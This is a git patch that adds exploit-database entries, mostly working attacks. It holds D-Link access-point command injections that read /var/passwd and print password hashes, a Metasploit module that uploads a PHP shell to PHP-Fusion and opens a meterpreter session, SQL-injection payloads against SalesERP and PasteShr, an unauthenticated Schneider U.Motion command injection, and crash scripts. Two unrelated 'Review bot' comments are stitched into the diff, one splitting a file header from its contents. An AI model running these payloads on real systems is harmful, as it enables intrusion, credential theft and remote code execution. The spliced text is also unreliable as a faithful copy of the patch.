From b04843e5cbc751fcdf41c3a60d2d2d046c06c111 Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Wed, 15 May 2019 05:01:56 +0000 Subject: [PATCH] DB: 2019-05-15 9 changes to exploits/shellcodes Selfie Studio 2.17 - 'Resize Image' Denial of Service (PoC) TwistedBrush Pro Studio 24.06 - 'Resize Image' Denial of Service (PoC) TwistedBrush Pro Studio 24.06 - 'Script Recorder' Denial of Service (PoC) TwistedBrush Pro Studio 24.06 - '.srp' Denial of Service (PoC) PHP-Fusion 9.03.00 - 'Edit Profile' Remote Code Execution (Metasploit) Sales ERP 8.1 - Multiple SQL Injection D-Link DWL-2600AP - Multiple OS Command Injection Schneider Electric U.Motion Builder 1.3.4 - 'track_import_export.php object_id' Unauthenticated Command Injection PasteShr 1.6 - Multiple SQL Injection --- exploits/hardware/webapps/46841.txt | 351 ++++++++++++++++++++++++++++ exploits/php/remote/46839.rb | 206 ++++++++++++++++ exploits/php/webapps/46840.txt | 85 +++++++ exploits/php/webapps/46846.txt | 109 +++++++++ exploits/php/webapps/46847.txt | 78 +++++++ exploits/windows/dos/46842.py | 22 ++ exploits/windows/dos/46843.py | 22 ++ exploits/windows/dos/46844.py | 22 ++ exploits/windows/dos/46845.py | 20 ++ files_exploits.csv | 9 + 10 files changed, 924 insertions(+) create mode 100644 exploits/hardware/webapps/46841.txt create mode 100755 exploits/php/remote/46839.rb create mode 100644 exploits/php/webapps/46840.txt create mode 100644 exploits/php/webapps/46846.txt create mode 100644 exploits/php/webapps/46847.txt create mode 100755 exploits/windows/dos/46842.py create mode 100755 exploits/windows/dos/46843.py create mode 100755 exploits/windows/dos/46844.py create mode 100755 exploits/windows/dos/46845.py diff --git a/exploits/hardware/webapps/46841.txt b/exploits/hardware/webapps/46841.txt new file mode 100644 index 000000000..58a5afeed --- /dev/null +++ b/exploits/hardware/webapps/46841.txt 
@@ -0,0 +1,351 @@ +Document Title: +=============== +D-Link DWL-2600AP - (Authenticated) OS Command Injection (Restore Configuration) + +Product & Service Introduction: +=============================== +The D-Link DWL-2600AP has a web interface for configuration. You can use any web browser you like to login to the D-Link DWL-2600AP. + +Affected Product(s): +==================== +Product: D-Link DWL-2600AP (Web Interface) + + +Exploitation Technique: +======================= +Local + + +Severity Level: +=============== +HIGH + +Base Score (CVSS): +=============== +7.8 + +=============== +Request Method(s): +[+] POST + +URL Path : +[+] /admin.cgi?action=config_restore + +Vulnerable POST Form Data Parameter: +[+] configRestore +[+] configServerip +=========================== +Device Firmware version : +[+] 4.2.0.15 + +Hardware Version : +[+] A1 + +Device name : +[+] D-Link AP + +Product Identifier : +[+] WLAN-EAP + +Proof of Concept (PoC): +======================= +The security vulnerability can be exploited by local authenticated attackers. +there is no input validation on the POST Form Data Parameter "configRestore" +and the Form Data Parameter "configServerip" (the input are passed directly to TFTP command) which allow attackers to execute arbitrary Operating System Commands on the device for malicious purposes. +The attacker has to know the credentials in order to access the Panel . +For security demonstration or to reproduce the vulnerability follow the provided information in the attachement provided Screenshot2.jpg . 
+ + +--- PoC Session Logs --- +POST /admin.cgi?action=config_restore HTTP/1.1 +Host: localhost +Connection: keep-alive +Content-Length: 357 +Cache-Control: max-age=0 +Origin: http://localhost +Upgrade-Insecure-Requests: 1 +Content-Type: multipart/form-data; +User-Agent: Xxxxxxxx +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 +Referer: http://localhost/admin.cgi?action=config_restore +Accept-Encoding: gzip, deflate +Accept-Language: fr-FR,fr;q=0.8,en-US;q=0.6,en;q=0.4 +Cookie: sessionHTTP=UQAafLpviZXbWDQpJAnrNmEJoFQIBAcX; clickedFolderFrameless=43%5E + +------WebKitFormBoundary4ZAwHsdySFjwNXxE +Content-Disposition: form-data; name="optprotocol" + +up +------WebKitFormBoundary4ZAwHsdySFjwNXxE +Content-Disposition: form-data; name="configRestore" + +;whoami; +------WebKitFormBoundary4ZAwHsdySFjwNXxE +Content-Disposition: form-data; name="configServerip" + +;cat /var/passwd;cat /var/passwd +------WebKitFormBoundary4ZAwHsdySFjwNXxE-- + + +----------->Response-----------> + +HTTP/1.0 200 OK +Content-Type: text/html; charset=UTF-8 + +/usr/bin/tftp: option requires an argument -- r +BusyBox v1.18.2 (2018-02-26 11:53:37 IST) multi-call binary. + +Usage: tftp [OPTIONS] HOST [PORT] + +Transfer a file from/to tftp server + +Options: + -l FILE Local FILE + -r FILE Remote FILE + -g Get file + -p Put file + -b SIZE Transfer blocks of SIZE octets + +sh: whoami: not found +sh: whoami: not found +root:$1$XDXDXDXD$JTedJSDYDA.pFjIToxlGA1:0:0:root:/root:/bin/sh +admin:2yn.4fvaTgedM:0:0:cisco:/root:/bin/splash +nobody:x:99:99:nobody:/:/bin/false + +Note : for testing put the values in the fields like this : +;command1;same_command1;command2;command2 + + +----+Discovered By Raki Ben Hamouda----+ + + +Document Title: +=============== +D-Link DWL-2600AP - (Authenticated) OS Command Injection (Save Configuration) + +Product & Service Introduction: +=============================== +The D-Link DWL-2600AP has a web interface for configuration. 
You can use any web browser you like to login to the D-Link DWL-2600AP. + +Affected Product(s): +==================== +Product: D-Link DWL-2600AP (Web Interface) + + +Exploitation Technique: +======================= +Local + + +Severity Level: +=============== +HIGH + +Base Score (CVSS): +=============== +7.8 + +=============== +Request Method(s): +[+] POST + +URL Path : +[+] /admin.cgi?action=config_save + +Vulnerable POST Form Data Parameter: +[+] configBackup +[+] downloadServerip +========================== +Device Firmware version : +[+] 4.2.0.15 + +Hardware Version : +[+] A1 + +Device name : +[+] D-Link AP + +Product Identifier : +[+] WLAN-EAP + +Proof of Concept (PoC): +======================= +The security vulnerability can be exploited by remote or local authenticated attackers. +there is no input validation on the POST Form Data Parameter "configBackup" +and the Form Data Parameter "downloadServerip" (the input are passed directly to TFTP command) which allow attackers to execute arbitrary Operating System Commands on the device for malicious purposes. +The attacker has to know the credentials in order to access the Panel . +For security demonstration or to reproduce the vulnerability follow the provided information in the attachement provided Screenshot3.jpg . 
+ +--- PoC Session Logs --- +POST /admin.cgi?action=config_save HTTP/1.1 +Host: localhost +Connection: keep-alive +Content-Length: 114 +Cache-Control: max-age=0 +Origin: http://localhost +Upgrade-Insecure-Requests: 1 +Content-Type: application/x-www-form-urlencoded +User-Agent: Xxxxxxxx +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 +Referer: http://localhost/admin.cgi?action=config_save +Accept-Encoding: gzip, deflate +Accept-Language: fr-FR,fr;q=0.8,en-US;q=0.6,en;q=0.4 +Cookie: sessionHTTP=PENcqbtRRuvmuZfPZnzuUddVIEAPADBp; clickedFolderFrameless=43%5E + +check_tftp=up&configBackup=;whoami;whoami;.xml&downloadServerip=;cat /var/passwd;cat /var/passwd + + +----------->Response-----------> + +HTTP/1.0 200 OK +Content-Type: text/html; charset=UTF-8 + +/usr/bin/tftp: option requires an argument -- r +BusyBox v1.18.2 (2018-02-26 11:53:37 IST) multi-call binary. + +Usage: tftp [OPTIONS] HOST [PORT] + +Transfer a file from/to tftp server + +Options: + -l FILE Local FILE + -r FILE Remote FILE + -g Get file + -p Put file + -b SIZE Transfer blocks of SIZE octets + +sh: whoami: not found +sh: whoami: not found +sh: .xml: not found +root:$1$XDXDXDXD$JTedJSDYDA.pFjIToxlGA1:0:0:root:/root:/bin/sh +admin:2yn.4fvaTgedM:0:0:cisco:/root:/bin/splash +nobody:x:99:99:nobody:/:/bin/false + +Note : for testing put the values in the fields like this : +;command1;same_command1;command2;etc... + + +----+Discovered By Raki Ben Hamouda----+ + + +Document Title: +=============== +D-Link DWL-2600AP - (Authenticated) OS Command Injection (Upgrade Firmware) + +Product & Service Introduction: +=============================== +The D-Link DWL-2600AP has a web interface for configuration. You can use any web browser you like to login to the D-Link DWL-2600AP. 
+ +Affected Product(s): +==================== +Product: D-Link DWL-2600AP (Web Interface) + + +Exploitation Technique: +======================= +Local + + +Severity Level: +=============== +HIGH + +Base Score (CVSS): +=============== +7.8 + +=============== +Request Method(s): +[+] POST + +URL Path : +[+] /admin.cgi?action=upgrade + +Vulnerable POST Form Data Parameter: +[+] firmwareRestore +[+] firmwareServerip + +=========================== +Device Firmware version : +[+] 4.2.0.15 + +Hardware Version : +[+] A1 + +Device name : +[+] D-Link AP + +Product Identifier : +[+] WLAN-EAP + +Proof of Concept (PoC): +======================= +The security vulnerability can be exploited by local authenticated attackers. +there is no input validation on the POST Form Data Parameter "firmwareRestore" +and the Form Data Parameter "firmwareServerip" (the input are passed directly to TFTP command) which allow attackers to execute arbitrary Operating System Commands on the device for malicious purposes. +The attacker has to know the credentials in order to access the Panel . +For security demonstration or to reproduce the vulnerability follow the provided information in the attachement provided Screenshot1.jpg . 
+ +--- PoC Session Logs --- + +POST /admin.cgi?action=upgrade HTTP/1.1 +Host: localhost +Connection: keep-alive +Content-Length: 525 +Cache-Control: max-age=0 +Origin: http://localhost +Upgrade-Insecure-Requests: 1 +Content-Type: multipart/form-data; +User-Agent: xxxxxxxxw +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 +Referer: http://localhost/admin.cgi?action=upgrade +Accept-Encoding: gzip, deflate +Accept-Language: fr-FR,fr;q=0.8,en-US;q=0.6,en;q=0.4 +Cookie: sessionHTTP=PENcqbtRRuvmuZfPZnzuUddVIEAPADBp; clickedFolderFrameless=43%5E + +------WebKitFormBoundaryBy0MsFaBOhdU6YJL +Content-Disposition: form-data; name="optprotocol" + +up +------WebKitFormBoundaryBy0MsFaBOhdU6YJL +Content-Disposition: form-data; name="firmwareRestore" + +;whoami;whoami +------WebKitFormBoundaryBy0MsFaBOhdU6YJL +Content-Disposition: form-data; name="firmwareServerip" + +;cat /var/passwd;cat /var/passwd +------WebKitFormBoundaryBy0MsFaBOhdU6YJL +Content-Disposition: form-data; name="update.device.packet-capture.stop-capture" + +up +------WebKitFormBoundaryBy0MsFaBOhdU6YJL-- + +----------->Response-----------> + +HTTP/1.0 200 OK +Content-Type: text/html; charset=UTF-8 + +/usr/bin/tftp: option requires an argument -- r +BusyBox v1.18.2 (2018-02-26 11:53:37 IST) multi-call binary. + +Usage: tftp [OPTIONS] HOST [PORT] + +Transfer a file from/to tftp server + +Options: + -l FILE Local FILE + -r FILE Remote FILE + -g Get file + -p Put file + -b SIZE Transfer blocks of SIZE octets + +sh: whoami: not found +sh: whoami: not found +root:$1$XDXDXDXD$JTedJSDYDA.pFjIToxlGA1:0:0:root:/root:/bin/sh +admin:2yn.4fvaTgedM:0:0:cisco:/root:/bin/splash +nobody:x:99:99:nobody:/:/bin/false + +Note : for testing put the values in the fields like this : +;command1;same_command1;command2;etc... +----+Discovered By Raki Ben Hamouda----+ \ No newline at end of file 
diff --git a/exploits/php/remote/46839.rb b/exploits/php/remote/46839.rb new file mode 100755 index 000000000..571c0d384 --- /dev/null +++ b/exploits/php/remote/46839.rb 
@@ -0,0 +1,206 @@ +## +# This module requires Metasploit: https://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +class MetasploitModule < Msf::Exploit::Remote + Rank = ExcellentRanking + + include Msf::Exploit::Remote::HttpClient + + def initialize(info = {}) + super(update_info(info, + 'Name' => "PHP-Fusion < 9.03.00 - 'Edit Profile' Remote Code Execution", + 'Description' => %q( + This module exploits command execution vulnerability in PHP-Fusion 9.03.00 and prior versions. + It is possible to execute commands in the system with ordinary user authority. No need admin privilage. + There is almost no control in the avatar upload section in the profile edit area. + Only a client-based control working with javascript. (Simple pre-check) + If we do not care about this control, the desired file can be sent to the server via Interception-Proxies. + The module opens the meterpreter session for you by bypassing the controls. + ), + 'License' => MSF_LICENSE, + 'Author' => + [ + 'AkkuS <Özkan Mustafa Akkuş>', # Discovery & PoC & Metasploit module + ], + 'References' => + [ + ['URL', 'http://www.pentest.com.tr/exploits/PHP-Fusion-9-03-00-Edit-Profile-Remote-Code-Execution.html'], # Details + ['URL', 'https://www.php-fusion.co.uk'] + ], + 'Platform' => 'php', + 'Arch' => ARCH_PHP, + 'Targets' => [['Automatic', {}]], + 'Privileged' => false, + 'DisclosureDate' => "May 11 2019", + 'DefaultTarget' => 0)) + + register_options( + [ + OptString.new('TARGETURI', [true, "Base PHP-Fusion directory path", '/']), + OptString.new('USERNAME', [true, "Username to authenticate with", '']), + OptString.new('PASSWORD', [true, "Password to authenticate with", '']) + ] + ) + end + + def exec + res = send_request_cgi({ + 'method' => 'GET', + 'uri' => normalize_uri(target_uri.path, "images","avatars", "#{@shell}") # shell url + }) + end +## +# Login and cookie information gathering +## + def login(uname, pass, check) + # 1st request to get 
fusion_token + res = send_request_cgi({ + 'method' => 'GET', + 'uri' => normalize_uri(target_uri.path, "home.php") + }) + + cookie = res.get_cookies + @fustoken = res.body.split("fusion_token' value='")[1].split("' />")[0] + # 2nd request to login + res = send_request_cgi( + 'method' => 'POST', + 'uri' => normalize_uri(target_uri.path, 'home.php'), + 'cookie' => cookie, + 'vars_post' => { + 'fusion_token' => @fustoken, + 'form_id' => 'loginform', + 'user_name' => uname, + 'user_pass' => pass, + 'login' => '' + } + ) + + cookie = res.get_cookies + location = res.redirection.to_s + if res && res.code == 302 && location.include?('login.php?error') + fail_with(Failure::NoAccess, "Authentication was unsuccessful with user: #{uname}") + else + return cookie + end + + return nil + end +## +# Upload malicious file // payload integration +## + def upload_shell(cookie, check) + + res = send_request_cgi({ + 'method' => 'GET', + 'uri' => normalize_uri(target_uri.path, "edit_profile.php"), + 'cookie' => cookie + }) + + ncookie = cookie + " " + res.get_cookies # gathering all cookie information + + res = send_request_cgi({ + 'method' => 'GET', + 'uri' => normalize_uri(target_uri.path, "edit_profile.php"), + 'cookie' => ncookie + }) + + # fetch some necessary post data informations + fustoken = res.body.split("fusion_token' value='")[1].split("' />")[0] + userid = res.body.split("profile.php?lookup=")[1].split('">")[0] + + # data preparation to delete priv avatar + delete = Rex::MIME::Message.new + delete.add_part("#{fustoken}", nil, nil, 'form-data; name="fusion_token"') + delete.add_part('userfieldsform', nil, nil, 'form-data; name="form_id"') + delete.add_part("#{datastore['USERNAME']}", nil, nil, 'form-data; name="user_name"') + delete.add_part("#{usermail}", nil, nil, 'form-data; name="user_email"') + delete.add_part('1', nil, nil, 'form-data; name="delAvatar"') + delete.add_part("#{userid}", nil, nil, 'form-data; name="user_id"') + delete.add_part("#{userhash}", nil, nil, 
'form-data; name="user_hash"') + delete.add_part("#{userhash}", nil, nil, 'form-data; name="user_hash"') + delete.add_part('Update Profile', nil, nil, 'form-data; name="update_profile"') + deld = delete.to_s + + res = send_request_cgi({ + 'method' => 'POST', + 'data' => deld, + 'agent' => 'Mozilla', + 'ctype' => "multipart/form-data; boundary=#{delete.bound}", + 'cookie' => ncookie, + 'uri' => normalize_uri(target_uri.path, "edit_profile.php") + }) + # priv avatar deleted. + res = send_request_cgi({ + 'method' => 'GET', + 'uri' => normalize_uri(target_uri.path, "edit_profile.php"), + 'cookie' => cookie + }) + + ncookie = cookie + " " + res.get_cookies # recheck cookies + + res = send_request_cgi({ + 'method' => 'GET', + 'uri' => normalize_uri(target_uri.path, "edit_profile.php"), + 'cookie' => ncookie + }) + + # They changed. fetch again... + fustoken = res.body.split("fusion_token' value='")[1].split("' />")[0] + userid = res.body.split("profile.php?lookup=")[1].split('">")[0] + # The "php" string must be removed for bypass.We can use " 'POST', + 'data' => data, + 'agent' => 'Mozilla', + 'ctype' => "multipart/form-data; boundary=#{pdata.bound}", + 'cookie' => ncookie, + 'uri' => normalize_uri(target_uri.path, "edit_profile.php") + }) + + location = res.redirection.to_s + if res && res.code == 302 && location.include?('error') + fail_with(Failure::NoAccess, 'Error occurred during uploading!') + else + print_status("Trying to upload #{fname}") + return true + end + + end +## +# Exploit controls and information +## + def exploit + cookie = login(datastore['USERNAME'], datastore['PASSWORD'], false) + print_good("Authentication was successful with user: #{datastore['USERNAME']}") + + if upload_shell(cookie, true) + print_good("Control was bypassed. Harmful file upload successfully!") + exec + end + end +## +# The end of the adventure (o_O) // AkkuS +## +end \ No newline at end of file 
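Review bot: In `login` the response is dereferenced before it is nil-checked — `location = res.redirection.to_s` runs first and only then `if res && res.code == 302 …` — so a connection failure raises NoMethodError instead of reaching fail_with; the same ordering sits at the end of `upload_shell`. Guarding first, `fail_with(Failure::Unreachable, 'No response from target') unless res`, ahead of the `location` line fixes both, and the `return nil` after `login`'s if/else is unreachable. The `check` parameter of `login` and `upload_shell` is never read, and `user_hash` is appended to the delete form twice. The text between the comment `# The "php" string must be removed for bypass.We can use "` and `'POST',` looks truncated in this rendering (presumably angle-bracket content lost on extraction), and `usermail`/`userhash` are used without a visible assignment, so the upload-request construction cannot be reviewed from this page. Naming an instance method `exec` also shadows `Kernel#exec`; a name like `request_uploaded_file` avoids that.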
diff --git a/exploits/php/webapps/46840.txt b/exploits/php/webapps/46840.txt new file mode 100644 index 000000000..fdf73fd1d --- /dev/null +++ b/exploits/php/webapps/46840.txt 
@@ -0,0 +1,85 @@ +=========================================================================================== +# Exploit Title: SalesERP v.8.1 SQL Inj. +# Dork: N/A +# Date: 13-05-2019 +# Exploit Author: Mehmet EMIROGLU +# Vendor Homepage: https://codecanyon.net/category/php-scripts?term=sales%20erp +# Version: v8.1 +# Category: Webapps +# Tested on: Wamp64, Windows +# CVE: N/A +# Software Description: ERP is a Modern and responsvie small Business +management system. +It is developed by PHP and Codeginiter framework. It is design and develop +for thinking shop, +small business, company and any types of business.Here has accounting, +management, invoice,user and data analysis. +=========================================================================================== +# POC - SQLi +# Parameters : customer_id, product_id +# Attack Pattern : %27/**/oR/**/4803139=4803139/**/aNd/**/%276199%27=%276199 +# POST Method : +http://localhost/erpbusiness/SalesERPv810/Cproduct/product_by_search?product_id=99999999[SQL +Inject Here] +# POST Method : +http://localhost/erpbusiness/SalesERPv810/Ccustomer/paid_customer_search_item?customer_id=99999999[SQL +Inject Here] +=========================================================================================== +########################################################################################### +=========================================================================================== +# Exploit Title: SalesERP v.8.1 SQL Inj. +# Dork: N/A +# Date: 13-05-2019 +# Exploit Author: Mehmet EMIROGLU +# Vendor Homepage: +https://codecanyon.net/category/php-scripts?term=sales%20erp +# Software Link: +http://www.codelist.cc/scripts/236407-erp-v810-business-erp-solution-product-shop-company-management-nulled.html +# Version: v8.1 +# Category: Webapps +# Tested on: Wamp64, Windows +# CVE: N/A +# Software Description: ERP is a Modern and responsvie small Business +management system. +It is developed by PHP and Codeginiter framework. 
It is design and develop +for thinking shop, +small business, company and any types of business.Here has accounting, +management, invoice,user and data analysis. +=========================================================================================== +# POC - SQLi +# Parameters : supplier_name +# Attack Pattern : +%27/**/RLIKE/**/(case/**/when/**//**/4190707=4190707/**/then/**/0x454d49524f474c55/**/else/**/0x28/**/end)/**/and/**/'%'=' +# POST Method : +http://localhost/erpbusiness/SalesERPv810/Csupplier/search_supplier?supplier_name=2900757&supplier_id=[SQL +Inject Here] +=========================================================================================== +########################################################################################### +=========================================================================================== +# Exploit Title: SalesERP v.8.1 SQL Inj. +# Dork: N/A +# Date: 13-05-2019 +# Exploit Author: Mehmet EMIROGLU +# Vendor Homepage: +https://codecanyon.net/category/php-scripts?term=sales%20erp +# Software Link: +http://www.codelist.cc/scripts/236407-erp-v810-business-erp-solution-product-shop-company-management-nulled.html +# Version: v8.1 +# Category: Webapps +# Tested on: Wamp64, Windows +# CVE: N/A +# Software Description: ERP is a Modern and responsvie small Business +management system. +It is developed by PHP and Codeginiter framework. It is design and develop +for thinking shop, +small business, company and any types of business.Here has accounting, +management, invoice,user and data analysis. 
+=========================================================================================== +# POC - SQLi +# Parameters : supplier_name +# Attack Pattern : 1260781%27 oR +if(length(0x454d49524f474c55)>1,sleep(3),0) --%20 +# POST Method : +http://localhost/erpbusiness/SalesERPv810/Cproduct/add_supplier?add-supplier=Save&address=[TEXT +INPUT]4990130&details=[TEXT INPUT]5207543&supplier_name=[SQL Inject Here] +=========================================================================================== \ No newline at end of file diff --git a/exploits/php/webapps/46846.txt b/exploits/php/webapps/46846.txt new file mode 100644 index 000000000..08f202e6b --- /dev/null +++ b/exploits/php/webapps/46846.txt 
@@ -0,0 +1,109 @@ +RCE Security Advisory +https://www.rcesecurity.com + + +1. ADVISORY INFORMATION +======================= +Product: Schneider Electric U.Motion Builder +Vendor URL: www.schneider-electric.com +Type: OS Command Injection [CWE-78] +Date found: 2018-11-15 +Date published: 2019-05-13 +CVSSv3 Score: 9.8 (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H) +CVE: CVE-2018-7841 + + +2. CREDITS +========== +This vulnerability was discovered and researched by Julien Ahrens from +RCE Security. + + +3. VERSIONS AFFECTED +==================== +Schneider Electric U.Motion Builder 1.3.4 and below + + +4. INTRODUCTION +=============== +Comfort, Security and Energy Efficiency – these are the qualities that you as +home owner expect from a futureproof building management solution. + +(from the vendor's homepage) + + +5. VULNERABILITY DETAILS +======================== +The script "track_import_export.php" is vulnerable to an unauthenticated +command injection vulnerability when user-supplied input to the HTTP GET/POST +parameter "object_id" is processed by the web application. Since the application +does not properly validate and sanitize this parameter, it is possible to inject +arbitrary commands into a PHP exec call. This is a bypass to the fix implemented +for CVE-2018-7765. + +The following Proof-of-Concept triggers this vulnerability causing a 10 seconds +sleep: + +POST /smartdomuspad/modules/reporting/track_import_export.php HTTP/1.1 +Host: localhost +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:63.0) Gecko/20100101 Firefox/63.0 +Accept: / +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Connection: close +Cookie: PHPSESSID=l337qjbsjk4js9ipm6mppa5qn4 +Content-Type: application/x-www-form-urlencoded +Content-Length: 86 + +op=export&language=english&interval=1&object_id=`sleep 10` + + +6. 
RISK +======= +To successfully exploit this vulnerability an unauthenticated attacker must only +have network-level access to a vulnerable instance of U.Motion Builder or a product +that depends on it. + +The vulnerability can be used to inject arbitrary OS commands, which leads to the +complete compromise of the affected installation. + + +7. SOLUTION +=========== +Uninstall/remove the installation. + +The product has been retired shortly after notifying the vendor about this issue, +so no fix will be published. + + +8. REPORT TIMELINE +================== +2018-11-14: Discovery of the vulnerability +2018-11-14: Tried to notify vendor via their vulnerability report form + but unfortunately the form returned some 403 error +2018-11-14: Tried to contact the vendor via Twitter (public tweet and DM) +2018-11-19: No response from vendor +2018-11-20: Tried to contact the vendor via Twitter again +2018-11-20: No response from vendor +2019-01-04: Without further notice the contact form worked again. Sent over + the vulnerability details. +2019-01-04: Response from the vendor stating that the affected code is owned by + a third-party vendor. Projected completion time is October 2019. +2019-01-10: Scheduled disclosure date is set to 2019-01-22 based on policy. +2019-01-14: Vendor asks to extend the disclosure date to 2019-03-15. +2019-01-15: Agreed on the disclosure extension due to the severity of the issue +2019-02-01: No further reply from vendor. Reminded them of the regular status + updates according to the disclosure policy +2019-02-04: Regular status updates from vendor from now on +2019-03-13: Vendor sends draft disclosure notification including assigned + CVE-2018-7841. The draft states that the product will be retired + and has already been removed from the download portal. A customer + notification is published (SEVD-2019-071-02). +2019-03-14: Public disclosure is delayed to give the vendor's customers a chance + to remove the product. 
+2019-05-13: Public disclosure + + +9. REFERENCES +============= +https://www.rcesecurity.com/2019/05/cve-2018-7841-schneider-electric-umotion-builder-remote-code-execution-0-day \ No newline at end of file diff --git a/exploits/php/webapps/46847.txt b/exploits/php/webapps/46847.txt new file mode 100644 index 000000000..502195b7e --- /dev/null +++ b/exploits/php/webapps/46847.txt 
@@ -0,0 +1,78 @@ +=========================================================================================== +# Exploit Title: PasteShr - SQL İnj. +# Dork: N/A +# Date: 14-05-2019 +# Exploit Author: Mehmet EMIROGLU +# Vendor Homepage: +https://codecanyon.net/item/pasteshr-text-hosting-sharing-script/23019437 +# Software Link: +https://www.codelist.cc/scripts/236331-pasteshr-v16-text-hosting-sharing-script.html +# Version: v1.6 +# Category: Webapps +# Tested on: Wamp64, Windows +# CVE: N/A +# Software Description: Pasteshr is a script which allows you to store any +text online for easy sharing. +The idea behind the script is to make it more convenient for people to +share large amounts of text online. +=========================================================================================== +# POC - SQLi +# Parameters : keyword +# Attack Pattern : +%27/**/RLIKE/**/(case/**/when/**//**/9494586=9494586/**/then/**/0x454d49524f474c55/**/else/**/0x28/**/end)/**/and/**/'%'=' +# GET Method : http://localhost/pasthr/public/search?keyword=4137548[SQL +Inject Here] +=========================================================================================== +########################################################################################### +=========================================================================================== +# Exploit Title: PasteShr - SQL İnj. +# Dork: N/A +# Date: 14-05-2019 +# Exploit Author: Mehmet EMIROGLU +# Vendor Homepage: +https://codecanyon.net/item/pasteshr-text-hosting-sharing-script/23019437 +# Software Link: +https://www.codelist.cc/scripts/236331-pasteshr-v16-text-hosting-sharing-script.html +# Version: v1.6 +# Category: Webapps +# Tested on: Wamp64, Windows +# CVE: N/A +# Software Description: Pasteshr is a script which allows you to store any +text online for easy sharing. +The idea behind the script is to make it more convenient for people to +share large amounts of text online. 
+=========================================================================================== +# POC - SQLi +# Parameters : password +# Attack Pattern : +/**/RLIKE/**/(case/**/when/**//**/6787556=6787556/**/then/**/0x454d49524f474c55/**/else/**/0x28/**/end) +# POST Method : +http://localhost/pasthr/public/login?_token=1lkW1Z61RZlmfYB0Ju07cfekR6UvsqaFAfeZfi2c&email=2270391&password=6195098[SQL +Inject Here] +=========================================================================================== +########################################################################################### +=========================================================================================== +# Exploit Title: PasteShr - SQL İnj. +# Dork: N/A +# Date: 14-05-2019 +# Exploit Author: Mehmet EMIROGLU +# Vendor Homepage: +https://codecanyon.net/item/pasteshr-text-hosting-sharing-script/23019437 +# Software Link: +https://www.codelist.cc/scripts/236331-pasteshr-v16-text-hosting-sharing-script.html +# Version: v1.6 +# Category: Webapps +# Tested on: Wamp64, Windows +# CVE: N/A +# Software Description: Pasteshr is a script which allows you to store any +text online for easy sharing. +The idea behind the script is to make it more convenient for people to +share large amounts of text online. +=========================================================================================== +# POC - SQLi +# Parameters : keyword +# Attack Pattern : +%27/**/RLIKE/**/(case/**/when/**//**/8266715=8266715/**/then/**/0x454d49524f474c55/**/else/**/0x28/**/end)/**/and/**/'%'=' +# POST Method : +http://localhost/pasthr/server.php/search?keyword=1901418[SQL Inject Here] +=========================================================================================== \ No newline at end of file diff --git a/exploits/windows/dos/46842.py b/exploits/windows/dos/46842.py new file mode 100755 index 000000000..99740f506 --- /dev/null +++ b/exploits/windows/dos/46842.py 
@@ -0,0 +1,22 @@
+# -*- coding: utf-8 -*-
+# Exploit Title: Selfie Studio 2.17 - 'Resize Image' Denial of Service (PoC)
+# Date: 13/05/2019
+# Author: Alejandra Sánchez
+# Vendor Homepage: http://www.pixarra.com
+# Software Link http://www.pixarra.com/uploads/9/4/6/3/94635436/tbselfiestudio_install.exe
+# Version: 2.17
+# Tested on: Windows 10
+
+# Proof of Concept:
+# 1.- Run the python script "Selfie_resize.py", it will create a new file "PoC.txt"
+# 2.- Copy the text from the generated PoC.txt file to clipboard
+# 3.- Open Selfie Studio
+# 4.- Go to 'Image' > 'Resize Image...'
+# 5.- Paste clipboard in the 'New Width/New Height' field
+# 6.- Click OK
+# 7.- Crashed
+
+buffer = "\x41" * 1000
+f = open ("PoC.txt", "w")
+f.write(buffer)
+f.close()
\ No newline at end of file
diff --git a/exploits/windows/dos/46843.py b/exploits/windows/dos/46843.py
new file mode 100755
index 000000000..5a23fb73f
--- /dev/null
+++ b/exploits/windows/dos/46843.py
@@ -0,0 +1,22 @@
+# -*- coding: utf-8 -*-
+# Exploit Title: TwistedBrush Pro Studio 24.06 - 'Resize Image' Denial of Service (PoC)
+# Date: 13/05/2019
+# Author: Alejandra Sánchez
+# Vendor Homepage: http://www.pixarra.com
+# Software Link http://www.pixarra.com/uploads/9/4/6/3/94635436/tbrusha.exe
+# Version: 24.06
+# Tested on: Windows 10
+
+# Proof of Concept:
+# 1.- Run the python script "TwistedBrush _resize.py", it will create a new file "PoC.txt"
+# 2.- Copy the text from the generated PoC.txt file to clipboard
+# 3.- Open TwistedBrush Pro Studio
+# 4.- Go to 'Image' > 'Resize Image...'
+# 5.- Paste clipboard in the 'New Width/New Height' field
+# 6.- Click OK
+# 7.- Crashed
+
+buffer = "\x41" * 1000
+f = open ("PoC.txt", "w")
+f.write(buffer)
+f.close()
\ No newline at end of file
diff --git a/exploits/windows/dos/46844.py b/exploits/windows/dos/46844.py
new file mode 100755
index 000000000..6fee45b75
--- /dev/null
+++ b/exploits/windows/dos/46844.py
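Review bot: Step 1 of the reproduction comment names the script `Selfie_resize.py`, but the file is committed as `46842.py`, so the comment points at a name that does not exist in the tree; the same mismatch is in 46843.py (`TwistedBrush _resize.py`), 46844.py (`TwistedBrush_recorder.py`) and 46845.py (`TwistedBrush_player.py`). The handle is also opened and closed by hand with a stray space in `open (`; `with open("PoC.txt", "w") as f:` followed by `f.write(buffer)` closes the file even if the write raises and drops the explicit `f.close()`. The name `buffer` shadows a Python 2 builtin, which the `# -*- coding` header suggests is still a target interpreter; `payload` or `data` avoids that.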
@@ -0,0 +1,22 @@
+# -*- coding: utf-8 -*-
+# Exploit Title: TwistedBrush Pro Studio 24.06 - 'Script Recorder' Denial of Service (PoC)
+# Date: 13/05/2019
+# Author: Alejandra Sánchez
+# Vendor Homepage: http://www.pixarra.com
+# Software Link http://www.pixarra.com/uploads/9/4/6/3/94635436/tbrusha.exe
+# Version: 24.06
+# Tested on: Windows 10
+
+# Proof of Concept:
+# 1.- Run the python script "TwistedBrush_recorder.py", it will create a new file "PoC.txt"
+# 2.- Copy the text from the generated PoC.txt file to clipboard
+# 3.- Open TwistedBrush Pro Studio
+# 4.- Go to 'Record' > 'Script Recorder...'
+# 5.- Paste clipboard in the 'Description' field
+# 6.- Click 'Brush' button
